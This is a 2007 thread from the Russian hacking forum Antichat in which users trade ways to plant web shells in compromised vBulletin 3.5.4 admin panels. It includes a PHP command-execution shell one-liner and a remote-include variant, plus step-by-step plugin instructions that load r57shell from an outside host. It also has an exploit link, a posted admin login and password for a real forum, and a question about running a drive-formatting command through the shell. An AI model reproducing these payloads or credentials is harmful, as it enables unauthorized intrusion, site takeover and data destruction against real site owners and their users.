Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   vBulletin 3.5.4 + shell (https://forum.antichat.xyz/showthread.php?t=36286)

x_zStas_x 24.03.2007 21:25

vBulletin 3.5.4 + shell
 
Ни самописный шелл, ни вообще любой другой через модули (как написано в теме про уязвимости vBulletin) не работает. заходишь на faq.php?cmd=ls например, а там фигня полная. поиск и всё. через смайлы тоже не канает. :confused:

Utochka 24.03.2007 21:44

отсюда вывод, оно пропатчено.....

x_zStas_x 24.03.2007 21:47

вот бл!!!! нах спрашивается я столько брутил??? :))

И.Г. 24.03.2007 21:48

дело не в патче,а в неправильном использовании скрипта... если ты в модуль зафигачил шел,то он будет работать 100% (при условии что ты правльно даешь команду) в версии 3.5.4

InferNo23 24.03.2007 21:55

может там винда стоит попробуй faq.php?cmd=dir

x_zStas_x 24.03.2007 21:59

не, там фряха! =)
а использую правильно, че вы думаете я шелл не могу заюзать?? =)
я ещё помню времена php-including =)

Utochka 24.03.2007 22:11

лабо пропачено, либо ты что то не так сделал. еще раз все проверь.

один раз было такое, что вот так не сработало faq.php?cmd=ls -al

пришлось прямо в модуль вставлять код, попробуй. но при выполнении следующей команды надо переписывать модуль. ТАк что сразу заливай шелл.

x_zStas_x 24.03.2007 22:52

и так тоже не канает!

a1ex 24.03.2007 22:55

Дай каму-нить линку пусть попытается кто-нить!!!

P.s.Кто же ентот счасливчик?:)

x_zStas_x 24.03.2007 22:58

неее :) я сам хочу :)
как думаете если к вложениям добавить пхп, а потом куда-нить вложить шелл будет работать?? :)

ShAnKaR 25.03.2007 05:52

топикстатрет а ты вобще подумал о том что там может стоять сейфмод или в дисабле_функ зафигачено все ехечные функции?

k1b0rg 25.03.2007 10:20

посмотри phpinfo();

если отключены функции выполнении команд, то юзай php

Например вывод всех файлов в каталоге:

Цитата:

<?
$dir=dir("./");
print "Pwd:".realpath($dir->path)."<br>\n";
while(False!==($entry=$dir->read())) {
if(is_dir(realpath($dir->path).'/'.$entry)) {
echo " d[".$entry."]".(is_writable(realpath($dir->path).'/'.$entry)?'[W]':'')."<br>\n";
} else {
echo $entry.(is_writable(realpath($dir->path).'/'.$entry)?'[W]':'')."<br>\n";
}
}
$dir->close();
?>

FraiDex 25.03.2007 11:28

попробуй вместо
PHP код:

<? system($_GET['cmd']) ?>

вбить
PHP код:

<? include($_GET['inc']) ?>

и проинклудь нормальный шелл... faq.php?inc=http://site.ru/shell.php, где http://site.ru/shell.php - ссылка на твой шелл

x_zStas_x 25.03.2007 11:55

к сожелению вообще ничего не канает :'(

x_zStas_x 25.03.2007 12:23

safe_mod = off

x_zStas_x 25.03.2007 12:25

disable_functions system, shell_exec, exec, proc_get_status, proc_nice, proc_terminate, define_syslog_variables, syslog, openlog, closelog, escapeshellcmd, passthru, readfile, ocinumcols, ini_alter, leak, listen, chgrp, set_time_limit, apache_note, apache_setenv, debugger_on, debugger_off, ftp_exec, dl, dll, ftp

x_zStas_x 25.03.2007 12:44

что блин делать?) вам на растерзание отдать??:))

x_zStas_x 25.03.2007 12:57

PHP код:

<?  echo "31337";  ?>

даже это не канает!!

a1ex 25.03.2007 13:01

Давай на растерзанье лутше...

x_zStas_x 25.03.2007 13:02

неее, что то тут не чисто!!:) надо разобраться!!:)

Alexsize 25.03.2007 14:07

Все тут чисто. Не парься, голяк тут полный. Но может можно по - другому обойти=)

x_zStas_x 25.03.2007 17:48

не догнал. обьясни почему голяк-то!
я вот всё думаю почему модули-то включены.
а даже самый простой код не обрабатывается :'(

x_zStas_x 25.03.2007 20:18

ладно!! фиг с вами!!) всё равно я не надеялся что там есть шестизнаки =)
жуйте!
http://6uin.info/forum/admincp/
Ponka:xfhkbr

репу хоть повысьте =)

AkyHa_MaTaTa 26.03.2007 20:52

Можно поставить плюсик за то что "так много брутил" но лутше убери Log : pass к админке, вроде бы на форуме запрещено выкладывать шеллы , а тебе еще и минусов накидают :) .

x_zStas_x 27.03.2007 09:40

да не, там с шеллом пустое дело! там все функции запрещены, которыми можно команды выполнять...

AkyHa_MaTaTa 27.03.2007 17:24

Защел я сегодня на этот форум, увидил много новых админов :)

Validol 05.04.2007 02:53

Сейчас на этом форуме написано:

"Вы лолы =)"

Удивительно.
А может кто-нибудь мне помочь со взломом vBulletin 3.6.4 ?
Конкретно нужен пасс от админки, другое не нужно...

SHaDoW[RF] 06.04.2007 23:12

Validol
я написал =)

maxster 09.04.2007 23:11

для булета я где то читал можно через шаблоны хмл заливать, сам шас ищу этот пост, если кто найдет киньте линк в ЛС

Zitt 10.04.2007 02:20

http://video.antichat.ru/file221.html
Тут всё показано)

maxster 10.04.2007 14:48

у меня админка старая, а форум 3.5.4, поэтому через смайлы никак, а модуля вообще нетБтак что твой способ мне не поможет, но я точно помню кто то писал тут, что можно через шаблоны заливать и даже точно говорил как, перечитал 13 страниц поиска ничего не нашел...

cardons 10.04.2007 15:43

Цитата:

Сообщение от maxster
у меня админка старая, а форум 3.5.4, поэтому через смайлы никак, а модуля вообще нетБтак что твой способ мне не поможет, но я точно помню кто то писал тут, что можно через шаблоны заливать и даже точно говорил как, перечитал 13 страниц поиска ничего не нашел...

Система модулей -> Управление модулями -> [Добавить новый модуль] -> Далее выбираешь Местоположение хака -> faq_complete. Заголовок пишешь любой к примеру 123
Код PHP модуля пишешь include "http://http://hcr.3dn.ru/expl/php/r57shell.txt";
Сохраняешь.И заходишь в FAQ и будет те счастье.
Да и незабудь выбрать модуль включен -> Да

AkyHa_MaTaTa 12.04.2007 00:36

А как подлить шелл в вобле 3.6.3?

fersa 12.04.2007 13:36

Можно что нибудь зделать имея доступ супер модератора?

AkyHa_MaTaTa 12.04.2007 15:31

Цитата:

Сообщение от fersa
Можно что нибудь зделать имея доступ супер модератора?

http://milw0rm.com/exploits/3387 - vBulletin <= 3.6.4

AkyHa_MaTaTa 12.04.2007 16:04

Цитата:

Сообщение от maxster
...что можно через шаблоны заливать ...

вот c воблы 3.6.3 кусок с щаблончика(кто на форуме):
<a href="forumdisplay.php?$session[sessionurl]do=markread" rel="nofollow">$vbphrase[mark_forums_read]</a>-
менюшка: Навигация->Все разделы прочитаны

href="forumdisplay.php?$session[sessionurl]do=markread
- попробывал из админ панели изминить на :
http://www.myshell.ru/shell.php?cmd=id
но походу админ запретил изменения файлов форума,
мне не удалось поменять в шаблоне ни одного символа-
You don't have permission to access/somescript.php.Хотя я знаю что админ менял этот скрипт и другие(копирайты вобловcкие убрал:) ).

maxster 12.04.2007 16:42

Cпасибо конечно, но я же писал, что админка от 3.0.1 там нету вообще возможности добавлять модуль!

2AkyHa_MaTaTa
Я точно помню, я на ачате читал, что можно, надо будет самому потом разобраться

valsha 13.04.2007 01:16

а нормально сработает такая конструкуия forumpath/faq.php?cmd=format d: /Q
с учетом того что шел нормально залился и forumpath/faq.php?cmd=dir показывает содержимое.
спасибо.


Время: 18:44